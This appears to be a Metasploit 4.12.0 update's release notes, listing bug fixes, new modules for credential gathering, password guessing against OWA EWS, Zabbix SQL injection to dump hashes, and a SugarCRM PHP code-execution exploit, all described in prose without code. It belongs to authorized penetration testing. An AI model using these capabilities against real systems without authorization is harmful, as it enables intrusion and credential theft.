Metasploit 4.12.0 (Update 2016091401)

Document created by tdoan Employee on Sep 14, 2016
Version 1Show Document
  • View in full screen mode

Bugs Fixed

 

  • PR #7205 - This patch shifts Nessus bridge plugin support in framework from older, built-in code to the newer, more up-to-date nessus_rest gem.
  • PR #7248 - This fixes a stack trace in post/windows/gather/credentials/enum_cred_store when the CredEnumerateA Railgun call doesn't exist in systems older than Windows XP.
  • PR #7251 - This fixes the CPORT source port option for auxiliary/scanner/smb/smb_login. Previously, the local_port option wasn't being passed to Metasploit::Framework::LoginScanner::SMB. This PR corrects that behavior.
  • PR #7262 - This adds support for the FLUSHALL Redis command (http://redis.io/commands/FLUSHALL) in auxiliary/scanner/redis/file_upload. This feature flushes all Redis databases of all keys, removing data around the uploaded file. This increases the probability that the uploaded file will be usable.
  • PR #7274 - The following deprecated modules were removed: auxiliary/dos/http/androidstockbrowseriframedoscve20126301, auxiliary/gather/apachekarafcommandexecution, auxiliary/gather/dnsbruteforce, auxiliary/gather/dnscachescraper, auxiliary/gather/dnsinfo, auxiliary/gather/dnsreverselookup, auxiliary/gather/dnssrvenum, auxiliary/scanner/netbios/nbnameprobe, exploits/linux/http/strutsdmiexec, and post/windows/manage/smartmigrate; the following module was undeprecated: exploits/windows/smb/psexec_psh.
  • PR #7290 - This fixes post/windows/gather/credentials/winscp to check for missing environment variables on module run. Previously, missing environment variables would cause the module to crash.
  • PR #7307 - This fixes a bug introduced by the ntlm gemification on some of the smb utilities (specifically smbversion scan and enumshares). By accident, some of the data was not populated correctly.
  • Pro: MS-303 - Running the task chain twice caused it to fail. Attempting to run a task chain when it is already running causes it to fail. This fix disables the 'Run' buttons when a task chain run is in progress.
  • Pro: MS-1981 - An issue caused the import of vulnerability data from two different Nexpose consoles to fail. This fixes the issue so that vulnerability data can be imported from multiple Nexpose consoles.
  • Pro: MS-1955 - Events in the task log now start with the timestamp so that they can be easily sorted.
  • Pro: MS-2007 - An issue caused Bruteforce to fail when it attempted to run the WordpressMulticall login scanner. This fix changes it to conform to the normal scanner API so that it can run without any issues.
  • Pro: MS-2031 - CVE links for vulnerabilities were not pointing to the correct URL. This fix ensures that the CVEs all reference the same site.
  • Pro: MS-2038 - In previous release of Metasploit 4.12.0, access restriction to the initial set up page after installation did not work properly. This resulted in a potential vulnerability that allowed an attacker to become the first to create a administrative user account. This fix resolves the security issue and restricts the page to local users.
  • Pro: MS-2043 - An issue caused Metasploit Pro to not start if a previous MetaModule run did not complete. This fix ensures that  Metasploit Pro starts as expected when a MetaModule run does not complete.

 

 

Features and Enhancements

 

  • PR #6616 - This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. It is typically faster than the traditional form-based OWA login method.
  • PR #7228 - Zabbix is an open-source network and application monitoring system. This module takes advantage of a remote SQL injection vulnerability in that product to obtain the usernames and hashes from the user database in version 3.0.3 and possibly lower.
  • PR #7278 - FTP Path Traversal modules, such as auxiliary/scanner/ftp/pcman_ftp_traversal, showed an error when run since the ftp data connection is not open. The path traversal scanner modules now work without error.
  • PR #7287 - This post-exploitation module retrieves the user names and cracks the password of MDaemon Email Server.
  • PR #7288 - This adds a login scanner module for Octopus Deploy Server. A tool for automated releases of ASP.Net applications into test, staging and production environments.
  • PR #7299 - The Wordpress login scanner is now changed to behave internally like other login scanners, which allows it to properly integrate into other projects, such as Metasploit Pro.
  • PR #7306 - This updates the references for these modules: auxiliary/admin/http/webnmscreddisclosure, auxiliary/admin/http/webnmsfiledownload, and exploits/multi/http/webnmsfileupload.

 

 

Exploits Added

 

  • SugarCRM REST Unserialize PHP Code Execution by EgiX - This modules exploits a PHP object injection vulnerability in SugarCRM. It allows an unauthenticated user to execute arbitrary PHP code under the context of www-data (web server level privilege).

 

Offline Update

 

To download the offline file for this update, go to http://updates.metasploit.com/packages/460768af7651e226c249e52bd1b776251df07a42. bin.

 

Version Information

 

PRO 4.12.0 updates to 4.12.0-2016091401

Attachments

    Outcomes